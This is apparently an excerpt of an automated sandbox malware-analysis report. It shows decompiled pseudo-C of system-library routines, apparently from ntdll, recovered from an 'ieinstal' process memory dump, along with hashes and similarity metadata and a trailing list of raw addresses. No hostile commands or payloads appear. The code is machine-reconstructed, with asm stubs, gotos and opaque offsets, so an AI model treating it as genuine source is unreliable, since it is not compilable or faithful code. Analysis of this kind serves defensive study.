                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                        					if(_t16 <= 1) {
                        						_t21 = 0x1f8;
                        						_t13 = 0;
                        						goto L14;
                        					}
                        					if(_t16 == 2) {
                        						goto L21;
                        					}
                        					if(_t16 != 4) {
                        						_t19 = 0xc00000f0;
                        						goto L7;
                        					}
                        					_t13 = 0;
                        					goto L6;
                        				} else {
                        					_t21 = 0x1f8;
                        					goto L5;
                        				}
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: e2eb65b02559d1f5399c39cc5bf06526eac85d5a76a1c4a16d3663f37b7fdfa0
                        • Instruction ID: a7820ad07089b4799577eb7480a84283ee1c47711d1ce3fb4af0a0b32c5b9193
                        • Opcode Fuzzy Hash: e2eb65b02559d1f5399c39cc5bf06526eac85d5a76a1c4a16d3663f37b7fdfa0
                        • Instruction Fuzzy Hash: B811C4357047438BEF154E1AC9A07167297EB9562CFA14FBAE8A1FB395DB70C8C18340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E1EDB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				void* _t41;
                        
                        				_t40 = __esi;
                        				_t39 = __edi;
                        				_t38 = __edx;
                        				_t35 = __ecx;
                        				_t34 = __ebx;
                        				_push(0x74);
                        				_push(0x1ede0d50);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                        					E1ED95720(0x65, 0, "Critical error detected %lx\n", _t35);
                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                        						asm("int3");
                        						 *(_t41 - 4) = 0xfffffffe;
                        					}
                        				}
                        				 *(_t41 - 4) = 1;
                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                        				 *((intOrPtr*)(_t41 - 0x64)) = L1ED5DEF0;
                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                        				_push(_t41 - 0x70);
                        				L1ED5DEF0(1, _t38);
                        				 *(_t41 - 4) = 0xfffffffe;
                        				return E1ED5D130(_t34, _t39, _t40);
                        			}






                        Strings
                        • Critical error detected %lx, xrefs: 1EDB8E21
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: ac78051f2cc2c4c5d145dab09061705db91b7c2e69cca9b793c3f21f450892cb
                        • Instruction ID: 7d9835272bff5642f8ee37bbca7be4b199a78c09118b0a3306fb409cb7fd3153
                        • Opcode Fuzzy Hash: ac78051f2cc2c4c5d145dab09061705db91b7c2e69cca9b793c3f21f450892cb
                        • Instruction Fuzzy Hash: C4115379C10388DBDF15CFA8890678DFBB1AB05310F20466EE46AAB382D3315602CF24
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1ED9FF60
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 3abf96941ad6f6a04bdcab2235cf8963958688917912e8d98b6b9a3f03cd9d6d
                        • Instruction ID: 3d9db8ec32beaba84bee7aef84595a2763d8877ad8c3e93d77c0205ba11b4c65
                        • Opcode Fuzzy Hash: 3abf96941ad6f6a04bdcab2235cf8963958688917912e8d98b6b9a3f03cd9d6d
                        • Instruction Fuzzy Hash: 2F11AD75910184EFDF12CF50CD54FA8BBB2FF08705F618694E50AAB2A1C739E985EB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E1EDD5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t296;
                        				signed char _t298;
                        				signed int _t301;
                        				signed int _t306;
                        				signed int _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed int _t313;
                        				void* _t327;
                        				signed int _t328;
                        				intOrPtr _t329;
                        				intOrPtr _t333;
                        				signed char _t334;
                        				signed int _t336;
                        				void* _t339;
                        				signed int _t340;
                        				signed int _t356;
                        				signed int _t362;
                        				short _t367;
                        				short _t368;
                        				short _t373;
                        				signed int _t380;
                        				void* _t382;
                        				short _t385;
                        				signed short _t392;
                        				signed char _t393;
                        				signed int _t395;
                        				signed char _t397;
                        				signed int _t398;
                        				signed short _t402;
                        				void* _t406;
                        				signed int _t412;
                        				signed char _t414;
                        				signed short _t416;
                        				signed int _t421;
                        				signed char _t427;
                        				intOrPtr _t434;
                        				signed char _t435;
                        				signed int _t436;
                        				signed int _t442;
                        				signed int _t446;
                        				signed int _t447;
                        				signed int _t451;
                        				signed int _t453;
                        				signed int _t454;
                        				signed int _t455;
                        				intOrPtr _t456;
                        				intOrPtr* _t457;
                        				short _t458;
                        				signed short _t462;
                        				signed int _t469;
                        				intOrPtr* _t474;
                        				signed int _t475;
                        				signed int _t479;
                        				signed int _t480;
                        				signed int _t481;
                        				short _t485;
                        				signed int _t491;
                        				signed int* _t494;
                        				signed int _t498;
                        				signed int _t505;
                        				intOrPtr _t506;
                        				signed short _t508;
                        				signed int _t511;
                        				void* _t517;
                        				signed int _t519;
                        				signed int _t522;
                        				void* _t523;
                        				signed int _t524;
                        				void* _t528;
                        				signed int _t529;
                        
                        				_push(0xd4);
                        				_push(0x1ede1178);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				_t494 = __edx;
                        				 *(_t528 - 0xcc) = __edx;
                        				_t511 = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                        				 *(_t528 - 0xbc) = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                        				_t427 = 0;
                        				 *(_t528 - 0x74) = 0;
                        				 *(_t528 - 0x9c) = 0;
                        				 *(_t528 - 0x84) = 0;
                        				 *(_t528 - 0xac) = 0;
                        				 *(_t528 - 0x88) = 0;
                        				 *(_t528 - 0xa8) = 0;
                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                        				if( *(_t528 + 0x1c) <= 0x80) {
                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                        					if(__eflags != 0) {
                        						_t421 = E1EDD4C56(0, __edx, __ecx, __eflags);
                        						__eflags = _t421;
                        						if(_t421 != 0) {
                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                        							E1ED4D000(0x410);
                        							 *(_t528 - 0x18) = _t529;
                        							 *(_t528 - 0x9c) = _t529;
                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                        							E1EDD5542(_t528 - 0x9c, _t528 - 0x84);
                        						}
                        					}
                        					_t435 = _t427;
                        					 *(_t528 - 0xd0) = _t435;
                        					_t474 = _t511 + 0x65;
                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        					_t511 = 0x18;
                        					while(1) {
                        						 *(_t528 - 0xa0) = _t427;
                        						 *(_t528 - 0xbc) = _t427;
                        						 *(_t528 - 0x80) = _t427;
                        						 *(_t528 - 0x78) = 0x50;
                        						 *(_t528 - 0x79) = _t427;
                        						 *(_t528 - 0x7a) = _t427;
                        						 *(_t528 - 0x8c) = _t427;
                        						 *(_t528 - 0x98) = _t427;
                        						 *(_t528 - 0x90) = _t427;
                        						 *(_t528 - 0xb0) = _t427;
                        						 *(_t528 - 0xb8) = _t427;
                        						_t296 = 1 << _t435;
                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                        						__eflags = _t436 & _t296;
                        						if((_t436 & _t296) != 0) {
                        							goto L92;
                        						}
                        						__eflags =  *((char*)(_t474 - 1));
                        						if( *((char*)(_t474 - 1)) == 0) {
                        							goto L92;
                        						}
                        						_t301 =  *_t474;
                        						__eflags = _t494[1] - _t301;
                        						if(_t494[1] <= _t301) {
                        							L10:
                        							__eflags =  *(_t474 - 5) & 0x00000040;
                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                        								L12:
                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                        									goto L92;
                        								}
                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                        									goto L92;
                        								}
                        								__eflags = _t442 -  *(_t474 - 0x11);
                        								if(_t442 !=  *(_t474 - 0x11)) {
                        									goto L92;
                        								}
                        								L15:
                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                        								 *(_t528 - 0xc0) = _t306;
                        								 *(_t528 - 0xa4) = _t306;
                        								__eflags =  *0x1edf60e8;
                        								if( *0x1edf60e8 != 0) {
                        									__eflags = _t306 - 0x40;
                        									if(_t306 < 0x40) {
                        										L20:
                        										asm("lock inc dword [eax]");
                        										_t310 =  *0x1edf60e8; // 0x0
                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                        										__eflags = _t311 & 0x00000001;
                        										if((_t311 & 0x00000001) == 0) {
                        											 *(_t528 - 0xa0) = _t311;
                        											_t475 = _t427;
                        											 *(_t528 - 0x74) = _t427;
                        											__eflags = _t475;
                        											if(_t475 != 0) {
                        												L91:
                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        												goto L92;
                        											}
                        											asm("sbb edi, edi");
                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                        											_t511 = _t498;
                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                        											__eflags =  *(_t312 - 5) & 1;
                        											if(( *(_t312 - 5) & 1) != 0) {
                        												_push(_t528 - 0x98);
                        												_push(0x4c);
                        												_push(_t528 - 0x70);
                        												_push(1);
                        												_push(0xfffffffa);
                        												_t412 = E1ED49710();
                        												_t475 = _t427;
                        												__eflags = _t412;
                        												if(_t412 >= 0) {
                        													_t414 =  *(_t528 - 0x98) - 8;
                        													 *(_t528 - 0x98) = _t414;
                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                        													 *(_t528 - 0x8c) = _t416;
                        													 *(_t528 - 0x79) = 1;
                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                        													__eflags = _t511;
                        												}
                        											}
                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                        											__eflags = _t446 & 0x00000004;
                        											if((_t446 & 0x00000004) != 0) {
                        												__eflags =  *(_t528 - 0x9c);
                        												if( *(_t528 - 0x9c) != 0) {
                        													 *(_t528 - 0x7a) = 1;
                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                        													__eflags = _t511;
                        												}
                        											}
                        											_t313 = 2;
                        											_t447 = _t446 & _t313;
                        											__eflags = _t447;
                        											 *(_t528 - 0xd4) = _t447;
                        											if(_t447 != 0) {
                        												_t406 = 0x10;
                        												_t511 = _t511 + _t406;
                        												__eflags = _t511;
                        											}
                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                        											 *(_t528 - 0x88) = _t427;
                        											__eflags =  *(_t528 + 0x1c);
                        											if( *(_t528 + 0x1c) <= 0) {
                        												L45:
                        												__eflags =  *(_t528 - 0xb0);
                        												if( *(_t528 - 0xb0) != 0) {
                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        													__eflags = _t511;
                        												}
                        												__eflags = _t475;
                        												if(_t475 != 0) {
                        													asm("lock dec dword [ecx+edx*8+0x4]");
                        													goto L100;
                        												} else {
                        													_t494[3] = _t511;
                        													_t451 =  *(_t528 - 0xa0);
                        													_t427 = E1ED46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                        													 *(_t528 - 0x88) = _t427;
                        													__eflags = _t427;
                        													if(_t427 == 0) {
                        														__eflags = _t511 - 0xfff8;
                        														if(_t511 <= 0xfff8) {
                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                        															asm("sbb ecx, ecx");
                        															__eflags = (_t451 & 0x000000e2) + 8;
                        														}
                        														asm("lock dec dword [eax+edx*8+0x4]");
                        														L100:
                        														goto L101;
                        													}
                        													_t453 =  *(_t528 - 0xa0);
                        													 *_t494 = _t453;
                        													_t494[1] = _t427;
                        													_t494[2] =  *(_t528 - 0xbc);
                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x14);
                        													if( *(_t528 + 0x14) == 0) {
                        														__eflags =  *[fs:0x18] + 0xf50;
                        													}
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x18);
                        													if( *(_t528 + 0x18) == 0) {
                        														_t454 =  *(_t528 - 0x80);
                        														_t479 =  *(_t528 - 0x78);
                        														_t327 = 1;
                        														__eflags = 1;
                        													} else {
                        														_t146 = _t427 + 0x50; // 0x50
                        														_t454 = _t146;
                        														 *(_t528 - 0x80) = _t454;
                        														_t382 = 0x18;
                        														 *_t454 = _t382;
                        														 *((short*)(_t454 + 2)) = 1;
                        														_t385 = 0x10;
                        														 *((short*)(_t454 + 6)) = _t385;
                        														 *(_t454 + 4) = 0;
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = 0x68;
                        														 *(_t528 - 0x78) = _t479;
                        													}
                        													__eflags =  *(_t528 - 0x79) - _t327;
                        													if( *(_t528 - 0x79) == _t327) {
                        														_t524 = _t479 + _t427;
                        														_t508 =  *(_t528 - 0x8c);
                        														 *_t524 = _t508;
                        														_t373 = 2;
                        														 *((short*)(_t524 + 2)) = _t373;
                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                        														 *((short*)(_t524 + 4)) = 0;
                        														_t167 = _t524 + 8; // 0x8
                        														E1ED4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t380 =  *(_t528 - 0x80);
                        														__eflags = _t380;
                        														if(_t380 != 0) {
                        															_t173 = _t380 + 4;
                        															 *_t173 =  *(_t380 + 4) | 1;
                        															__eflags =  *_t173;
                        														}
                        														_t454 = _t524;
                        														 *(_t528 - 0x80) = _t454;
                        														_t327 = 1;
                        														__eflags = 1;
                        													}
                        													__eflags =  *(_t528 - 0xd4);
                        													if( *(_t528 - 0xd4) == 0) {
                        														_t505 =  *(_t528 - 0x80);
                        													} else {
                        														_t505 = _t479 + _t427;
                        														_t523 = 0x10;
                        														 *_t505 = _t523;
                        														_t367 = 3;
                        														 *((short*)(_t505 + 2)) = _t367;
                        														_t368 = 4;
                        														 *((short*)(_t505 + 6)) = _t368;
                        														 *(_t505 + 4) = 0;
                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = _t479 + _t523;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t454;
                        														if(_t454 != 0) {
                        															_t186 = _t454 + 4;
                        															 *_t186 =  *(_t454 + 4) | 1;
                        															__eflags =  *_t186;
                        														}
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0x7a) - _t327;
                        													if( *(_t528 - 0x7a) == _t327) {
                        														 *(_t528 - 0xd4) = _t479 + _t427;
                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                        														E1ED4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + _t522;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t199 = _t505 + 4;
                        															 *_t199 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t199;
                        														}
                        														_t505 =  *(_t528 - 0xd4);
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0xa8);
                        													if( *(_t528 - 0xa8) != 0) {
                        														_t356 = _t479 + _t427;
                        														 *(_t528 - 0xd4) = _t356;
                        														_t462 =  *(_t528 - 0xac);
                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                        														_t485 = 0xc;
                        														 *((short*)(_t356 + 2)) = _t485;
                        														 *(_t356 + 6) = _t462;
                        														 *((short*)(_t356 + 4)) = 0;
                        														_t211 = _t356 + 8; // 0x9
                        														E1ED4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                        														E1ED4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0x18;
                        														_t427 =  *(_t528 - 0x88);
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t505 =  *(_t528 - 0xd4);
                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t362 =  *(_t528 - 0x80);
                        														__eflags = _t362;
                        														if(_t362 != 0) {
                        															_t222 = _t362 + 4;
                        															 *_t222 =  *(_t362 + 4) | 1;
                        															__eflags =  *_t222;
                        														}
                        													}
                        													__eflags =  *(_t528 - 0xb0);
                        													if( *(_t528 - 0xb0) != 0) {
                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                        														_t458 = 0xb;
                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                        														E1ED4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t241 = _t505 + 4;
                        															 *_t241 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t241;
                        														}
                        													}
                        													_t328 =  *(_t528 + 0x1c);
                        													__eflags = _t328;
                        													if(_t328 == 0) {
                        														L87:
                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                        														_t455 =  *(_t528 - 0xdc);
                        														 *(_t427 + 0x14) = _t455;
                        														_t480 =  *(_t528 - 0xa0);
                        														_t517 = 3;
                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                        															asm("rdtsc");
                        															 *(_t427 + 0x3c) = _t480;
                        														} else {
                        															 *(_t427 + 0x3c) = _t455;
                        														}
                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                        														_t456 =  *[fs:0x18];
                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                        														_t427 = 0;
                        														__eflags = 0;
                        														_t511 = 0x18;
                        														goto L91;
                        													} else {
                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                        														__eflags = _t519;
                        														 *(_t528 - 0x8c) = _t328;
                        														do {
                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                        																_t334 =  *_t519;
                        															} else {
                        																_t334 = 0;
                        															}
                        															_t336 = _t334 & 0x000000ff;
                        															__eflags = _t336;
                        															_t427 =  *(_t528 - 0x88);
                        															if(_t336 == 0) {
                        																_t481 = _t479 + _t506;
                        																__eflags = _t481;
                        																 *(_t528 - 0x78) = _t481;
                        																E1ED4F3E0(_t479 + _t427, _t457, _t506);
                        																_t529 = _t529 + 0xc;
                        															} else {
                        																_t340 = _t336 - 1;
                        																__eflags = _t340;
                        																if(_t340 == 0) {
                        																	E1ED4F3E0( *(_t528 - 0xb8), _t457, _t506);
                        																	_t529 = _t529 + 0xc;
                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                        																} else {
                        																	__eflags = _t340 == 0;
                        																	if(_t340 == 0) {
                        																		__eflags = _t506 - 8;
                        																		if(_t506 == 8) {
                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                        																		}
                        																	}
                        																}
                        															}
                        															_t339 = 0x10;
                        															_t519 = _t519 + _t339;
                        															_t263 = _t528 - 0x8c;
                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                        															__eflags =  *_t263;
                        															_t479 =  *(_t528 - 0x78);
                        														} while ( *_t263 != 0);
                        														goto L87;
                        													}
                        												}
                        											} else {
                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                        												 *(_t528 - 0xa2) = _t392;
                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                        												__eflags = _t469;
                        												while(1) {
                        													 *(_t528 - 0xe4) = _t511;
                        													__eflags = _t392;
                        													_t393 = _t427;
                        													if(_t392 != 0) {
                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                        													}
                        													_t395 = (_t393 & 0x000000ff) - _t427;
                        													__eflags = _t395;
                        													if(_t395 == 0) {
                        														_t511 = _t511 +  *_t469;
                        														__eflags = _t511;
                        													} else {
                        														_t398 = _t395 - 1;
                        														__eflags = _t398;
                        														if(_t398 == 0) {
                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                        														} else {
                        															__eflags = _t398 == 1;
                        															if(_t398 == 1) {
                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                        																_t402 =  *_t469 & 0x0000ffff;
                        																 *(_t528 - 0xac) = _t402;
                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        															}
                        														}
                        													}
                        													__eflags = _t511 -  *(_t528 - 0xe4);
                        													if(_t511 <  *(_t528 - 0xe4)) {
                        														break;
                        													}
                        													_t397 =  *(_t528 - 0x88) + 1;
                        													 *(_t528 - 0x88) = _t397;
                        													_t469 = _t469 + 0x10;
                        													__eflags = _t397 -  *(_t528 + 0x1c);
                        													_t392 =  *(_t528 - 0xa2);
                        													if(_t397 <  *(_t528 + 0x1c)) {
                        														continue;
                        													}
                        													goto L45;
                        												}
                        												_t475 = 0x216;
                        												 *(_t528 - 0x74) = 0x216;
                        												goto L45;
                        											}
                        										} else {
                        											asm("lock dec dword [eax+ecx*8+0x4]");
                        											goto L16;
                        										}
                        									}
                        									_t491 = E1EDD4CAB(_t306, _t528 - 0xa4);
                        									 *(_t528 - 0x74) = _t491;
                        									__eflags = _t491;
                        									if(_t491 != 0) {
                        										goto L91;
                        									} else {
                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        										goto L20;
                        									}
                        								}
                        								L16:
                        								 *(_t528 - 0x74) = 0x1069;
                        								L93:
                        								_t298 =  *(_t528 - 0xd0) + 1;
                        								 *(_t528 - 0xd0) = _t298;
                        								_t474 = _t474 + _t511;
                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        								_t494 = 4;
                        								__eflags = _t298 - _t494;
                        								if(_t298 >= _t494) {
                        									goto L100;
                        								}
                        								_t494 =  *(_t528 - 0xcc);
                        								_t435 = _t298;
                        								continue;
                        							}
                        							__eflags = _t494[2] | _t494[3];
                        							if((_t494[2] | _t494[3]) == 0) {
                        								goto L15;
                        							}
                        							goto L12;
                        						}
                        						__eflags = _t301;
                        						if(_t301 != 0) {
                        							goto L92;
                        						}
                        						goto L10;
                        						L92:
                        						goto L93;
                        					}
                        				} else {
                        					_push(0x57);
                        					L101:
                        					return E1ED5D130(_t427, _t494, _t511);
                        				}
                        			}

                        0x1edd625c
                        0x1edd625e
                        0x1edd6260
                        0x1edd6260
                        0x1edd6260
                        0x1edd6260
                        0x1edd625e
                        0x1edd6264
                        0x1edd6267
                        0x1edd6269
                        0x1edd6315
                        0x1edd6315
                        0x1edd631b
                        0x1edd631e
                        0x1edd6324
                        0x1edd6327
                        0x1edd632f
                        0x1edd6330
                        0x1edd6333
                        0x1edd633a
                        0x1edd633c
                        0x1edd6335
                        0x1edd6335
                        0x1edd6335
                        0x1edd633f
                        0x1edd6342
                        0x1edd634c
                        0x1edd6352
                        0x1edd6355
                        0x1edd6355
                        0x1edd6359
                        0x00000000
                        0x1edd626f
                        0x1edd6275
                        0x1edd6275
                        0x1edd6278
                        0x1edd627e
                        0x1edd627e
                        0x1edd6281
                        0x1edd6287
                        0x1edd628d
                        0x1edd6298
                        0x1edd629c
                        0x1edd62a2
                        0x1edd629e
                        0x1edd629e
                        0x1edd629e
                        0x1edd62a7
                        0x1edd62a7
                        0x1edd62aa
                        0x1edd62b0
                        0x1edd62f0
                        0x1edd62f0
                        0x1edd62f2
                        0x1edd62f8
                        0x1edd62fd
                        0x1edd62b2
                        0x1edd62b2
                        0x1edd62b2
                        0x1edd62b5
                        0x1edd62dd
                        0x1edd62e2
                        0x1edd62e5
                        0x1edd62b7
                        0x1edd62b8
                        0x1edd62bb
                        0x1edd62bd
                        0x1edd62c0
                        0x1edd62c4
                        0x1edd62cd
                        0x1edd62cd
                        0x1edd62c0
                        0x1edd62bb
                        0x1edd62b5
                        0x1edd6302
                        0x1edd6303
                        0x1edd6305
                        0x1edd6305
                        0x1edd6305
                        0x1edd630c
                        0x1edd630c
                        0x00000000
                        0x1edd627e
                        0x1edd6269
                        0x1edd5eac
                        0x1edd5ebb
                        0x1edd5ebe
                        0x1edd5ecb
                        0x1edd5ecb
                        0x1edd5ece
                        0x1edd5ece
                        0x1edd5ed4
                        0x1edd5ed7
                        0x1edd5ed9
                        0x1edd5edb
                        0x1edd5edb
                        0x1edd5ee1
                        0x1edd5ee1
                        0x1edd5ee3
                        0x1edd5f20
                        0x1edd5f20
                        0x1edd5ee5
                        0x1edd5ee5
                        0x1edd5ee5
                        0x1edd5ee8
